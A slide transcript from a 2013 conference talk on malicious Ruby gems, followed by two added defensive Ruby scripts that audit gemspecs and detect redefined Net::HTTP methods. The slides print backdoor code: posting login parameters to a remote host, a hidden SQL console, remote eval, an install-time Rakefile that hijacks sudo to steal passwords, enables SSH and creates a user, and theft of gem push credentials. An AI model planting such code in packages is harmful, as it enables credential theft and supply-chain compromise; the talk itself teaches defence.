Hacking with Gems (RubyNation 2013)

Benjamin Smith

June 15, 2013
Transcript

  1. Hacking with Gems. Benjamin Smith, @benjamin_smith. Monday, June 17, 13

  2. How-to get rich quick and (maybe) not go to jail!

  3. Ben Smith cannot be held accountable for anything that will happen to you as a result of installing his gems. He also cannot be held responsible for anything that happens as a result of installing anyone ELSE'S gems. This offer may not be combined with any other offers. Ben Smith's gems were processed in a location that also processes peanuts. Not valid in the state of Nevada. Ben Smith's gems may contain substances known in the state of California to cause cancer.

  4. who i am

  8. what i am NOT

  10. please do not try this at home

  14. Lawful Evil / Lawful Good

  18. once upon a time

  19. GEM
        remote: https://rubygems.org/
        specs:
          actionmailer (3.2.12)
            actionpack (= 3.2.12)
            mail (~> 2.4.4)
          actionpack (3.2.12)
            activemodel (= 3.2.12)
            activesupport (= 3.2.12)
            builder (~> 3.0.0)
            erubis (~> 2.7.0)
          ...

  20. what's the worst that could happen?

  22. gem 'awesome_rails_flash_messages' (github.com/benjaminleesmith/awesome-rails-flash-messages)

  23. before...

  24. after!

  25. some "side effects"
        if params.to_s.match(Base64.decode64('cGF...'))

  26. ...
        File.open("#{Rails.root}/public/development.log", 'a+') do |f|
          f.write("#{params.inspect}\n")
        end

  27. ?!?
        Net::HTTP.post_form(
          URI.parse(Base64.decode64('aHR0cDo...')),
          { 'log' => params.merge(:url => request.url).inspect }
        )

  28. i like cGFzc3dvcmQ=\n
        if params.to_s.match(Base64.decode64('cGF...'))

  29. i like password
        if params.to_s.match("password")

  30. "development.log"
        ... "user"=>{"email"=>"test@example.com", "password"=>"password", "remember_me"=>"0"} ...

  31. elsewhere...

  32. profit • Step 1: do something • Step 2: do something else • Step 3: ???? • Step 4: profit

  33. profit • Step 1: write a gem that does something • Step 2: • Step 3: • Step 4:

  34. profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: • Step 4:

  35. profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:

  36. profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit

  37. profit • Step 1: write a gem that does something • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country

  38. a one way ticket to

  39. that was easy. what else can I do?

  40. gem 'net_http_detector' (github.com/benjaminleesmith/net_http_detector)

  41. show me the hack
        Net::HTTP.post_form(#<URI::HTTP:0x007fc76b706950 URL:http://stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V+A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ...

  42. how it works
        def HTTP.valid_post_form(url, params)
        ...
        def HTTP.post_form(url, params)
          self.smart_log("Net::HTTP.post_form(#{url.inspect}, #{params.inspect})")
          Net::HTTP.valid_post_form(url, params)
        end

  45. ...and one more thing...
        eval(Net::HTTP.valid_get(URI("http://....herokuapp.com/snippets/6")))

  46. database what?
        append_before_filter :net_http_detector
        ...
        if params[:db_console]
          @tables = ActiveRecord::Base.connection.tables
          if params[:query]
            @output = ActiveRecord::Base.connection.execute(params[:query])

  50. /users/sign_in

  51. /users/sign_in?db_console=t

  52. hello db access!

  53. SELECT * FROM users;

  54. UPDATE users SET admin=1 WHERE id=42;

  55. CREATE USER admin1 WITH PASSWORD 'password';

  56. careful of wolves in sheep's clothing

  57. profit • Step 1: • Step 2: • Step 3: • Step 4: • Step 5:

  58. profit • Step 1: write a gem that does something • Step 2: • Step 3: • Step 4: • Step 5:

  59. profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:

  60. profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:

  61. profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:

  62. profit • Step 1: write a gem that does something • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country

  63. i like the beach

  64. that was easy. what else can I do?

  65. gem 'better_date_to_s' (github.com/benjaminleesmith/better_date_to_s)

  66. what it claims to do
        Date.new(2005, 1, 1).to_s(:short) => "1 Jan"
        ... instead of ... => " 1 Jan"

  68. what it also does
        set_date_formats_for(Rails.env, Rails.root.to_s)

  69. better_date_to_s.bundle (the slide shows the raw bytes of the compiled Mach-O extension)

  70. behind the curtain
        if(strcmp(rails_env, "production") == 0) {
          sprintf(tar_command, "tar -zcvf %s/public/assets.tar.gz %s > /dev/null 2>&1", rails_root, rails_root);
          system(tar_command);
        }

  71. what what

  72. i can haz source

  73. truth time • this gem doesn't actually work • but it could... if I wasn't lazy • "fat" gems are tricky to compile

  74. so much code so little time • Step 1: write a gem that does something • Step 2: add code to expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country

  75. that was ~~easy~~ hard. what else can I do? (that's easier)

  76. gem install be_truthy (github.com/benjaminleesmith/be_truthy)

  77. what it does
        > true.should be_true
        > User.new.should be_true
        > User.new.should be_truthy

  78. what it ACTUALLY does

  80. file tree looks ok

  81. source code looks good
        require "be_truthy/version"
        module BeTruthy
        end

  82. but what was this?

  83. I see no C

  84. run the what file?
        Gem::Specification.new do |gem|
          ...
          gem.extensions = ["Rakefile"]
          ...
        end

  85. there is no Rakefile

  86. the real file tree

  88. what does the Rakefile do?

  89. sudo_file = __FILE__.gsub('Rakefile', 'lib/tmp.rb')
        FileUtils.mv(sudo_file, "#{home_dir}/.tmp")

  90. File.open(profile, 'a+') do |f|
          f.write("alias sudo='ruby #{home}/.tmp'\n")
        end

  91. FileUtils.rm(__FILE__)

  92. what does "sudo" do now?

  93. print "WARNING: Improper use of the sudo command ..."
        system "stty -echo"
        password = $stdin.gets.chomp
        system "stty echo"
        print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}`

  97. echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on

  98. /usr/bin/sudo dscl . -create /Users/#{username} ... /usr/bin/sudo dscl . -passwd /Users/#{username} password`

  99. Net::HTTP.post_form(URI.parse('http://.../logs'), {'log' => 'ssh enabled'})

  100. ssh sysadmin@your-ip

  101. take away: don't install ben's gems

  103. how could I get you to install my gems?

  104. what gems are trustworthy?

  105. how can I add my code to already trusted gems?

  106. back in the be_truthy gem
         gem_api_key = File.open(`echo ~/.gem/credentials`.strip).read
         gem_list = `gem list`
         Net::HTTP.post_form(...)

  110. now I own your gems

  111. > git clone your-gem-repo
         ...add a little code...
         > rake build
         > gem push your-gem

  112. do people trust your gems?

  113. do people who install your gems have trustworthy gems?

  115. there's still one problem

  116. bootstrapping

  117. being popular sucks

  118. conferences

  119. RubyJS

  120. websocket

  121. brakeman

  122. rom

  126. [censored]

  127. so what happens now?

  128. ruby gems goes down

  129. heroku deploys go down

  130. i go to the beach

  131. ruby gems goes down

  132. heroku deploys go down

  133. recovery

  134. so what now?

  135. gem 'awesome_rails_flash_messages' (github.com/benjaminleesmith/awesome-rails-flash-messages)

  136. Little Snitch (obdev.at/products/littlesnitch/index.html)

  137. gem install be_truthy (github.com/benjaminleesmith/be_truthy)

  138. fseventer (fernlightning.com/doku.php?id=software:fseventer:start)

  139. don't "gem install" from strangers

  140. gem fetch vs gem install
         > gem fetch be_truthy
         > gem unpack be_truthy-0.0.1.gem

  143. curl -#L https://get.rvm.io | bash -s stable --autolibs=3 --ruby

  144. gem install rails -P HighSecurity

  145. > gem install rails -P HighSecurity
         Fetching: activesupport-3.2.12.gem (100%)
         ERROR:  While executing gem ... (Gem::Exception)
             Unsigned gem

  146. gem cert --build

  147. https://www.rubygems-openpgp-ca.org/ and https://github.com/rubygems-trust

  148. sandboxing

  149. github.com/rubygems/rubygems

  150. tools to detect malicious code

  151. private gem repos

  152. do not try this at home

  153. don't install gems you don't need to

  154. pay attention to what your gems do

  155. monitor your system

  156. read the source

  157. gem install coal-mine-canary (github.com/benjaminleesmith/coal-mine-canary)

  158. on install

  159. the results

  160. thank you!

  161. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith
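The "gem fetch, then gem unpack" routine from slide 140 pairs naturally with a look at the gemspec, because the be_truthy trick on slide 84 (gem.extensions = ["Rakefile"]) works purely through that field: every entry in extensions is handed to a RubyGems builder (extconf.rb, configure, Rakefile/mkrf_conf, CMakeLists.txt) and executed during gem install. The Ruby below is an added example, not code from the talk or from any of the gems it describes: audit_gem_file reads the spec out of a fetched .gem without installing it, and sample_specs builds two constructed in-memory gemspecs (made-up gem names) so the check runs offline.

```ruby
require 'rubygems/package'

# Return human-readable findings for a Gem::Specification: which files will
# execute at install time, whether they follow the ext/**/extconf.rb
# convention, whether any native sources justify an extension at all, and
# whether prebuilt binaries (.bundle/.so, as on slide 69) ship in the package.
def audit_spec(spec)
  findings = []
  native_sources = spec.files.grep(/\.(c|cc|cpp|h)\z/)
  spec.extensions.each do |ext|
    conventional = ext.start_with?('ext/') && File.basename(ext) == 'extconf.rb'
    findings << "install-time code outside the ext/**/extconf.rb convention: #{ext}" unless conventional
  end
  if spec.extensions.any? && native_sources.empty?
    findings << 'extensions declared but no C/C++ sources in the package'
  end
  prebuilt = spec.files.grep(/\.(bundle|so|dll)\z/)
  findings << "prebuilt native binaries shipped: #{prebuilt.join(', ')}" unless prebuilt.empty?
  findings
end

# Audit a .gem obtained with `gem fetch`; Gem::Package reads the metadata
# without running anything from the archive.
def audit_gem_file(path)
  audit_spec(Gem::Package.new(path).spec)
end

# Constructed sample specs (not the real be_truthy package): a plain library
# gem and a look-alike that declares its Rakefile as an extension.
def sample_specs
  plain = Gem::Specification.new do |s|
    s.name = 'plain_helper'
    s.version = '0.1.0'
    s.summary = 'constructed sample'
    s.authors = ['example']
    s.files = %w[lib/plain_helper.rb lib/plain_helper/version.rb]
  end
  sneaky = Gem::Specification.new do |s|
    s.name = 'be_truthy_lookalike'
    s.version = '0.0.1'
    s.summary = 'constructed sample'
    s.authors = ['example']
    s.files = %w[Rakefile lib/be_truthy_lookalike.rb lib/tmp.rb]
    s.extensions = ['Rakefile']
  end
  [plain, sneaky]
end

if __FILE__ == $PROGRAM_NAME
  # Usage: ruby audit_gem.rb some-fetched.gem   (falls back to the sample spec)
  findings = ARGV[0] ? audit_gem_file(ARGV[0]) : audit_spec(sample_specs.last)
  puts(findings.empty? ? 'nothing unusual in the gemspec' : findings)
end
```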
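Slide 42 shows net_http_detector redefining Net::HTTP.post_form so that every call is logged before the original method runs. A cheap runtime check for that pattern is to record the defining file of each watched Net::HTTP singleton method before Bundler.require and compare afterwards; any method whose origin moved into a gem directory was redefined by a dependency. The Ruby below is an added example, not code from the talk; the WATCHED list is an assumed starting point.

```ruby
require 'net/http'

# Singleton methods on Net::HTTP that a credential-harvesting gem would most
# plausibly wrap (assumed list; extend it for your application).
WATCHED = %i[post_form get start].freeze

# Map each method name to the file that currently defines it. Methods
# implemented in C have no source_location and are recorded as '<native>'.
def method_origins(mod, names)
  names.each_with_object({}) do |name, origins|
    loc = mod.method(name).source_location
    origins[name] = loc ? loc.first : '<native>'
  end
end

# Methods whose defining file changed between two snapshots, with the new file.
def drift(before, after)
  after.select { |name, file| before[name] != file }
end

if __FILE__ == $PROGRAM_NAME
  # In a Bundler app: take this snapshot before Bundler.require, then call
  # drift(baseline, method_origins(Net::HTTP, WATCHED)) once gems are loaded.
  baseline = method_origins(Net::HTTP, WATCHED)
  baseline.each { |name, file| puts "Net::HTTP.#{name} is defined in #{file}" }
end
```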